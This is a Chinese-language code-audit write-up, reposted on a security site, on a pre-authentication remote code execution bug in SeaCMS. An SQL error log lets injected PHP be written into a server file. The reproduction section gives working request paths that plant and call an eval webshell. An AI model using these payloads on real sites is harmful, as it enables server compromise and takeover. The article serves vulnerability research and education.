代码审计之Seacms前台Getshell分析

admin 2022年1月18日23:25:23代码审计评论60 views1095字阅读3分39秒阅读模式

章源自【字节脉搏社区】-字节脉搏实验室

作者-Beginners

扫描下方二维码进入社区

代码审计之Seacms前台Getshell分析

0x01 Seacms介绍

海洋影视管理系统(seacms,海洋cms)海洋cms是基于PHP+MySql技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选。

代码审计之Seacms前台Getshell分析

代码审计之Seacms前台Getshell分析

0x02 漏洞复现:

利用路径:/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[a]);?%3E

代码审计之Seacms前台Getshell分析

代码审计之Seacms前台Getshell分析

直接访问:data/mysqli_error_trace.php?a=phpinfo();

代码审计之Seacms前台Getshell分析

代码审计之Seacms前台Getshell分析

写入Shell后,成功连接:data/[email protected]($_POST['a']);

代码审计之Seacms前台Getshell分析

代码审计之Seacms前台Getshell分析

0x03 代码分析:

第一步:/comment/api/index.php 分析:

代码审计之Seacms前台Getshell分析

作用:第3行引用了/include/common.php这个文件。

代码审计之Seacms前台Getshell分析

第二步:打开/include/common.php这个文件,定位到98~118行:代码审计之Seacms前台Getshell分析

作用:将 $_GET、$_POST、$_COOKIE 传入的参数注册成全局变量。

代码审计之Seacms前台Getshell分析

第三步:回到/comment/api/index.php继续分析,定位到第18行:代码审计之Seacms前台Getshell分析

作用:发现在第18行处调用了 ReadData 函数,我们跟进这个函数。

代码审计之Seacms前台Getshell分析

代码审计之Seacms前台Getshell分析

作用:声明$type,$pCount,$rlist,这些参数都是前面注册的全局变量。

代码审计之Seacms前台Getshell分析

第四步:因为后面的函数都用到了$rlist这个变量,重点分析$rlist:代码审计之Seacms前台Getshell分析

作用:implode()把$rlist组合成字符串,然后进入Readrlist函数。

代码审计之Seacms前台Getshell分析

第五步:跟进Readrlist函数:

代码审计之Seacms前台Getshell分析

作用:拼接并执行SQL语句:id in ($ids) ,这里的$ids其实就是刚才可控的 $rlist 变量。

代码审计之Seacms前台Getshell分析

第六步:SQL执行后,引用了Execute()函数:

代码审计之Seacms前台Getshell分析

第七步:跟进Execute()函数,函数文件位置:include/sql.class.php 第224~258行:

代码审计之Seacms前台Getshell分析

作用:当查询结果为false时,使用DisplayError()函数的方法。

代码审计之Seacms前台Getshell分析

第八步:跟进DisplayError()函数:

代码审计之Seacms前台Getshell分析

作用:这个函数首先输出了提示错误的html代码,之后将mysql的错误日志写入/data/mysqli_error_trace.php文件并保存,直到这里就触发了Getshell的漏洞。

代码审计之Seacms前台Getshell分析

0x04 Cms下载地址:

下载地址:https://share.weiyun.com/5qpXRztI

代码审计之Seacms前台Getshell分析

本文始发于微信公众号(渗透云笔记):代码审计之Seacms前台Getshell分析

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月18日23:25:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  代码审计之Seacms前台Getshell分析 http://cn-sec.com/archives/491879.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: